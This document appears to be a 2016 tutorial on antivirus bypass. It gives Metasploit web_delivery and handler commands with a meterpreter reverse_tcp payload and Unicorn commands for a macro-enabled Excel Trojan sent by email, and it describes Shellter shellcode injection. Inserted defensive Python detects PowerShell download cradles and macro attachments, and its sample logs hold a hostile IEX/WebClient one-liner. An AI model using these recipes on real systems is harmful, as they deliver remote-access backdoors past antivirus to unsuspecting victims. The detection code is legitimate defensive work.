antivirus bypass techniques - 2016
A. PowerShell Exploitation
1. Technique: Generating Executable (.exe & .bat) Files
Description: The attacker creates a Windows executable (.exe) program which acts as a Trojan. In this technique the attacker generates a PowerShell command which creates a WebClient to fetch the backdoor, and embeds that command inside his executable program.
How: The attacker uses the Metasploit framework to generate the PowerShell command.
use exploit/multi/script/web_delivery
show targets
set target 2
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <IP>
set SRVHOST <Server IP>
set URIPATH /
exploit
After the link is created, the attacker's only remaining task is to run the command on the victim's computer. To do that the attacker creates a batch file, e.g. Notepad.bat. In Notepad.bat the attacker writes his code and embeds the evil PowerShell command, converts the .bat file to .exe and sends it to the victim.
Result:
Figure 1. Generating PowerShell Command
Figure 2. Embedding & Conversion of backdoor to .exe
Figure 3. Virus Total Result For Both Files
Figure 4. Victim Executing The Program
Figure 5. Attacker Getting Sessions
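The detection side of Technique A, as an added example that is not part of the original document: the web_delivery module hands the victim a PowerShell one-liner that builds a WebClient and pulls the stage from the attacker's server, and that shape is visible in process-creation telemetry (Windows event 4688 or Sysmon event 1 command-line fields) regardless of how the .bat was wrapped into an .exe. The script below scores command lines against a small set of cradle indicators; the indicator weights, the threshold and the log lines are all constructed for this illustration.

```python
"""Screen process-creation command lines for a PowerShell download cradle.

Added illustration for the defender side of Technique A. The indicators,
weights and sample log lines are constructed for this example; the regexes
are a heuristic starting point, not a complete signature set.
"""
import re

# (name, pattern, weight): weights are illustrative, tune them to your environment.
INDICATORS = [
    ("webclient",     re.compile(r"net\.webclient", re.I), 3),
    ("download",      re.compile(r"download(string|file|data)\s*\(", re.I), 3),
    ("iex",           re.compile(r"\b(iex|invoke-expression)\b", re.I), 3),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I), 2),
    ("noprofile",     re.compile(r"-no?p(rofile)?\b", re.I), 1),
    ("encoded",       re.compile(r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("url",           re.compile(r"https?://", re.I), 1),
]
THRESHOLD = 6  # a bare cradle scores well above this; admin one-offs stay below

# Constructed command lines as they would appear in 4688 / Sysmon EID 1 records.
SAMPLE_LOG = [
    # benign administrative usage
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    r"powershell.exe Get-Service | Where-Object {$_.Status -eq 'Running'}",
    # web_delivery-style cradle as described in Technique A (constructed, RFC 5737 address)
    r"powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.0.2.10:8080/'))",
    # encoded variant; the base64 blob is a dummy ('AAA...' encoded), not a real stage
    r"powershell.exe -NoP -NonI -W Hidden -Enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB",
]


def score_command(cmd):
    """Return (score, [matched indicator names]) for one command line."""
    hits = [name for name, rx, _w in INDICATORS if rx.search(cmd)]
    score = sum(w for name, _rx, w in INDICATORS if name in hits)
    return score, hits


def is_suspicious(cmd, threshold=THRESHOLD):
    """True when the command line crosses the alerting threshold."""
    return score_command(cmd)[0] >= threshold


def triage(lines, threshold=THRESHOLD):
    """Return [(score, hits, cmd)] for every line that crosses the threshold."""
    flagged = []
    for cmd in lines:
        score, hits = score_command(cmd)
        if score >= threshold:
            flagged.append((score, hits, cmd))
    return flagged


if __name__ == "__main__":
    for score, hits, cmd in triage(SAMPLE_LOG):
        print(f"[{score}] {', '.join(hits)}\n    {cmd}")
```

Command-line screening catches the plain cradle; the `-enc` form only scores on its wrapper flags, so in practice pair this with PowerShell Script Block Logging (event 4104), which records the decoded script and exposes the same WebClient and IEX tokens after decoding.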
B. Macros
1. Technique: Generating Macro-Enabled (.xlsm) Files
Description: The attacker creates an encoded payload using a tool named Unicorn and uses that payload to generate a macro-enabled Microsoft Excel file which acts as a Trojan.
How:
Download and install Unicorn, then generate the macro payload:
git clone https://github.com/trustedsec/unicorn.git
cd unicorn
python unicorn.py windows/meterpreter/reverse_tcp <Attacker IP> <Port For Listening> macro
The attacker uses the Metasploit framework and starts the handler exploit:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <IP>
set LPORT <PORT>
exploit
Now use the generated payload to create the macro-enabled Excel file.
Result:
Figure 6. Generate Payload with Unicorn
Figure 7. Attacker Machine Start Handler
Figure 8. Create a macro-enabled Excel file with evil code
Figure 9. Virus Total Result
Figure 10. Attaching Trojan With Email
Figure 11. Send Trojan With Email On Different Email Vendors
Figure 12. Victim AV Bypass
Figure 13. Victim Opens The File
Figure 14. Attacker Sessions
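The mail-gateway side of Technique B, as an added example that is not part of the original document: an .xlsm is an OOXML zip container, and what makes it macro-enabled is the embedded VBA project part (xl/vbaProject.bin) together with the macro-enabled content type, not the file extension. The script below builds two minimal workbooks in memory (constructed, not openable in Excel, just enough structure to inspect), then checks a candidate attachment for VBA and returns a quarantine decision that does not trust the extension the sender chose.

```python
"""Flag macro-enabled Office attachments at a mail gateway.

Added illustration for the defender side of Technique B. The two workbooks
are constructed in memory for this example; the content-type strings are
the standard OOXML ones, the vbaProject.bin bytes are a placeholder.
"""
import io
import zipfile

PLAIN_CT = "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"
MACRO_CT = "application/vnd.ms-excel.sheet.macroEnabled.main+xml"
VBA_CT = "application/vnd.ms-office.vbaProject"

CONTENT_TYPES_PLAIN = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    f'<Override PartName="/xl/workbook.xml" ContentType="{PLAIN_CT}"/>'
    "</Types>"
)
CONTENT_TYPES_MACRO = CONTENT_TYPES_PLAIN.replace(PLAIN_CT, MACRO_CT).replace(
    "</Types>", f'<Override PartName="/xl/vbaProject.bin" ContentType="{VBA_CT}"/></Types>'
)


def build_workbook(with_macro):
    """Return bytes of a minimal OOXML workbook (constructed; not a valid Excel file)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES_MACRO if with_macro else CONTENT_TYPES_PLAIN)
        z.writestr("xl/workbook.xml", "<workbook/>")
        if with_macro:
            # Placeholder bytes standing in for a compiled VBA project (OLE magic + padding).
            z.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0" + b"\x00" * 16)
    return buf.getvalue()


def inspect_office_file(data):
    """Return the macro indicators found in an OOXML document (or empty results if not a zip)."""
    result = {"is_ooxml": False, "vba_parts": [], "macro_content_type": False}
    try:
        z = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return result
    with z:
        names = z.namelist()
        result["is_ooxml"] = "[Content_Types].xml" in names
        # The VBA part is the ground truth; look for it anywhere in the container.
        result["vba_parts"] = [n for n in names if n.lower().endswith("vbaproject.bin")]
        if result["is_ooxml"]:
            ct = z.read("[Content_Types].xml").decode("utf-8", "replace")
            result["macro_content_type"] = "macroEnabled" in ct or "vbaProject" in ct
    return result


def is_macro_enabled(data):
    """True when the document carries a VBA project or declares a macro-enabled content type."""
    r = inspect_office_file(data)
    return bool(r["vba_parts"]) or r["macro_content_type"]


def screen_attachment(filename, data):
    """Gateway policy: quarantine any attachment containing VBA, whatever its extension claims."""
    if is_macro_enabled(data):
        return "quarantine"
    if filename.lower().endswith((".xlsm", ".docm", ".pptm")):
        return "quarantine"  # macro extension with no VBA inside is still outside policy
    return "allow"


if __name__ == "__main__":
    for name, blob in [("report.xlsx", build_workbook(False)), ("invoice.xlsx", build_workbook(True))]:
        print(name, inspect_office_file(blob), "->", screen_attachment(name, blob))
```

Inspecting the container rather than the extension is the point: the file in Figure 10 is delivered as an attachment, and a gateway rule on `.xlsm` alone is defeated by renaming, whereas the VBA part travels with the document. Legacy `.xls` binaries are OLE2 files, not zips, and need a separate OLE stream check.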
C. Shellter Project
1. Technique: Shellcode Injection Tool
Description: Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created. It can be used to inject shellcode into native Windows applications (currently 32-bit applications only). The shellcode can be something of your own or something generated through a framework such as Metasploit.
Result:
Figure 15
Figure 16
Figure 17
Figure 18